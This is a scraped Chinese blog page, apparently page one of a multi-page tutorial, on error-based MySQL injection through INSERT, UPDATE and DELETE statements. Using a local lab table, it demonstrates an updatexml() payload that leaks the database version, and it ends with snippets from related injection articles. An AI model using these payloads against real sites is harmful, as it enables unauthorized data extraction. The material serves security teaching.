mysql 注入 update_利用insert,update和delete注入获取数据_MySQL

最新推荐文章于 2024-05-21 09:31:53 发布
最新推荐文章于 2024-05-21 09:31:53 发布
阅读量348 收藏
点赞数
文章标签: mysql 注入 update
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29474431/article/details/113597254
版权

0x00 简介

利用SQL注入获取数据库数据,利用的方法可以大致分为联合查询、报错、布尔盲注以及延时注入,通常这些方法都是基于select查询语句中的SQL注射点来实现的。那么,当我们发现了一个基于insert、update、delete语句的注射点时(比如有的网站会记录用户浏览记录,包括referer、client_ip、user-agent等,还有类似于用户注册、密码修改、信息删除等功能),还可以用如上方法获取我们需要的数据吗?在这里,我们以MYSQL的显错为例,看一下如何在insert、update、delete的注射点中获取我们想要的数据。

0x01 环境搭建

为了更好的演示注射效果,我们先利用下面的语句创建原始数据:create database newdb;use newdb; create table users(id int(3) not null auto_increment,username varchar(20) not null,password varchar(20) not null, primary key (id)); insert into users values(1,'Jane','Eyre');

1405KF3TT40-4U06.jpg

看一下当前数据结构:

1405KF3YT40-5HN.jpg

0x02 注入语法

因为我们这里是用的显错模式,所以思路就是在insert、update、delete语句中人为构造语法错误,利用如下语句:insert into users (id, username, password) values (2,''inject here'','Olivia'); insert into users (id, username, password) values (2,""inject here"",'Olivia');

1405KF393Z60-D614.jpg

注意:大家看到本来是要填入username字段的地方,我们填了'inject here'和”inject here”两个字段来实现爆错,一个是单引号包含、一个是双引号包含,要根据实际的注入点灵活构造。

0x03 利用updatexml()获取数据

updatexml()函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。

payload:or updatexml(1,concat(0x7e,(version())),0) or

Insert:INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(1,concat(0x7e,(version())),0) or'', 'Nervo');

1405KF3a1X0-MX4.jpg

[1] [2] [3] [4] [5] [6] 下一页

f68f2add0b68e4f9810432fce46917b7.png

相关标签:

本文原创发布php中文网,转载请注明出处,感谢您的尊重!

张少轶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
记一次mysql注入漏洞修复
yunhuan29的专栏
05-10 5219
php mysql注入漏洞处理办法摘抄
mysql 注入 update_UPDATE 查询中的 SQL 注入
weixin_39712821的博客
01-19 510
今天,我介绍一个我最近发现的一个 SQL 注入漏洞。在一个Hacking夜晚,依然像往常一样喝着我最爱的冰镇果汁,挑了一个 bug 比较多的程序,开始测试。就像其他研究员一样,我四处测试 XSS payload。(通常用 '">发生错误的地方是一个 full name 对话框,我紧接着尝试了 test'test ,同样产生了 500 错误,意味着由于单引号的问题导致该错误的发生。意识到是这个...
在进行SQL注入时遇到UPDATE语句时注意事项
最新发布
banliyaoguai的博客
05-21 339
例如,将一个字符串值与一个 DOUBLE 类型的列进行比较或运算,或者将一个非数字字符串转换为 DOUBLE 类型时。但是有一种情况,就是里面注入的sql语句如果时系统函数的话,他是可以显示出系统函数的结果的,原因就是系统函数的优先级比较高,Mysql在发现系统函数的话就会执行系统函数。若使用下列代码,会出现不报错也不显示的结果。在update进行判断时他会将下面的语句用括号括起来然后再进行判断,下列语句在遇到1的时候就判断正确。在注入注入语句应该如下图,要使用1和报错函数连接。
mysql 注入 修改密码_SQL注入-二次注入修改其他用户密码
weixin_42463997的博客
01-19 531
二次注入1、使用特殊的SQL符号注册账号$username= mysql_escape_string($_POST['username']) ;$pass= mysql_escape_string($_POST['password']);$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")...
mysql注入点修改数据_利用MySQL数据库注入点来获得更多信息实操
weixin_33751984的博客
02-05 280
以下的文章主要介绍的是如何正确利用MySQL数据库注入点来得到更多MySQL数据库的相关信息,我们大家都知道当注射MySQL库的相关输入点的时,我们就可以通过 version()/user()/database()/password()等内置函数来得到MySQL数据库的相关信息。 其实我们在注射的时以下的文章主要介绍的是如何正确利用MySQL数据库注入点来得到更多MySQL数据库的相关信息,我们大...
MySQL触发器 Update触发Insert失败
09-10
MySQL触发器是一种数据库对象,它允许在特定的数据库操作(如INSERTUPDATEDELETE)发生时自动执行预定义的SQL语句。在这个场景中,开发者尝试创建一个UPDATE触发器,当`triggletest_triggle`表中的数据被更新时...
How_to_Add-Update-Delete-Record_using_MySQL.zip_MYSQL
09-20
本教程将详细介绍如何在MySQL中进行数据的添加、更新和删除操作,以及如何利用MySQL数据库进行记录管理。 首先,我们要理解数据库的基本概念。在MySQL中,数据库是一个组织数据的系统,表是存储数据的结构,记录则...
详解MySQL数据库insertupdate语句
12-16
在标准的SQL中有3个语句,它们是INSERTUPDATE以及DELETE。 用于操作数据库的SQL一般分为两种,一种是查询语句,也就是我们所说的SELECT语句,另外一种就是更新语句,也叫做数据操作语句。言外之意,就 是对数据...
MySQL数据库INSERTUPDATEDELETE以及REPLACE语句的用法详解
09-10
MySQL数据库中的INSERTUPDATEDELETE和REPLACE语句是数据操作语言(DML)的核心,它们用于在数据库中创建、修改和删除数据。下面将详细解释这些语句的使用方法。 1. INSERT语句: - 基本用法:INSERT INTO `...
mysql-查询演练-商城查询-数据修改-sql注入及防范
pyhui的技术博客
08-21 229
目标 通过python来操作数据库 写一个类,封装常用的一些方法 架构 》基本架构 》提示用户,并提供分支处理函数 查询功能 》查询所有商品的方法 》缺什么就补什么 》查询分类 》当前代码存在的问题 每一个函数里面都在创建连接,新建游标 这些游标也好,连接对象也好,都是局部变量 方法结束,变量就没有了 为了方便其它的地方也可以使用 把它们可以弄成全局的 ?对于一个对象而言,什么是全局的?...
jquery 动态表单数据注入(己修改)
dxking100的博客
06-20 287
1.标准的html。 2.用户可以html自写义枚举和连接数据库为select、checkbox、radio等标签进行注入。 3.服务端返数据(json格式)html自动填充。 4.数据交互时以ajax方式传递。 Insert title here jsonToSelectHtml = function(id, data) {//json转为select的h...
【安全牛学习笔记】mysql注入总结
edu_aqniu的博客
10-31 771
mysql注入总结 目录: 0x00 mysql一般注入(select) 0x01 mysql一般注入(insertupdate) 0x02 mysql报错注入 0x03 mysql一般盲注 0x04 mysql时间盲注 0x05 mysql其他注入技巧 0x06 mysql数据库版本特性 0x07 声明 正文: 0x00 mys
【23】WEB安全学习----MySQL注入-8(二阶注入)
尚未佩妥剑 转眼便江湖
09-21 948
什么是二阶注入? 简单的来说,就是第一次注入时,开发者进行了编码等限制,无法直接进行注入,但是在数据库中保留了我们注入语句,程序在其它地方再次调用保存着我们注入语句时发生了注入,这就是二阶注入,有点类似存储型XSS漏洞的意思。 二阶注入演示 实验环境介绍 text数据库里有张users表,目前里面已有admin和root账户 用户注册页面 <!DOCTYPE html&...
SQL注入Update注入
weixin_43765321的博客
03-03 5659
1. MySQL中的update函数 如果我们需要修改或更新MysQL中的数据,我们可以使用SQLUPDATE命令来操作。首先更新某一行中的一个列。 UPDATE table SET column=mew_value WHERE column= value 为lastname 是"Wilson”的人添加firstname : UPDATE Person SET FirstName = 'Fred WHERE LastName = ‘Wilson’ 更新某一行中的若干列 UPDATE table SET c
SQL注入实战:Update注入
ting_liang的博客
01-21 882
有的程序员在写源代码的时候,只是对查询的sql语句的用户输入内容进行了过滤,忽略了updateupdate表名称set列名称=新值where更新条件;1、sqli-labs less-17关。类型sql语句的用户输入的内容的过滤。二、mysqlUpdate语句复习。如下图所示,爆出数据库名称。一:Update注入原理。如下图所示,爆出版本信息。
【SQL注入UPDATEinsertdelete注入
07-08 3336
【SQL注入
update语句_WEB安全之SQL注入(13)——update注入
weixin_39848953的博客
12-09 2590
01前言大家好,我是阿里斯,一名IT行业小白。上一篇文章分享了insert注入,算是一个铺垫,今天我们一起来看看update注入update注入是非常危险一种注入。可能因为payload构造不合理会直接导致整张表都被修改。02update注入update正常语句update users set sex='man' where id=$id;update注入是非常危险的,不管你开发还是安...
mysql insert 注入_InsertUpdate型SQL注入的实践之旅
weixin_35696092的博客
01-19 240
1.有回显注入int型注入点和字符型都采用按位或|和按位异或^获取数据。如果拼接的值为0,可以采用按位或|运算显示查询到的数据,如果拼接的值不是0(以100为例),可以采用按位异或^运算显示运算后的数据,然后再异或一次可以恢复查询的数据。注意查询到的数据经过hex转换,如果值大于Mysql bigint 最大值9223372036854775807时,获取到的数据均为922337203685477...
mysql数据库中insert数据,delete某些数据怎么添加batch_flag
06-07
MySQL 数据库中添加 `batch_flag` 标志位的一种常见做法是,在对应的表中添加一个名为 `batch_flag` 的列,该列的类型可以为 `TINYINT` 或 `BOOLEAN` 等布尔类型。 对于插入数据操作,可以在插入数据时将 `batch_flag` 列设置为 1,例如: ``` INSERT INTO 表名 (列1, 列2, batch_flag) VALUES (值1, 值2, 1); ``` 对于删除数据操作,可以在删除数据时添加一个 `UPDATE` 语句,将 `batch_flag` 列设置为 0,例如: ``` UPDATE 表名 SET batch_flag = 0 WHERE 条件; DELETE FROM 表名 WHERE 条件 AND batch_flag = 0; ``` 其中,`UPDATE` 语句将 `batch_flag` 列设置为 0,表示当前不是批量操作;`DELETE` 语句中的 `batch_flag = 0` 条件用于过滤掉已经被标记为批量操作的数据,以免误删。 需要注意的是,在进行批量操作时,需要将 `batch_flag` 列的值设置为 1,以便在后续操作中进行相应的处理。在非批量操作时,需要将 `batch_flag` 列的值设置为 0,以免误操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值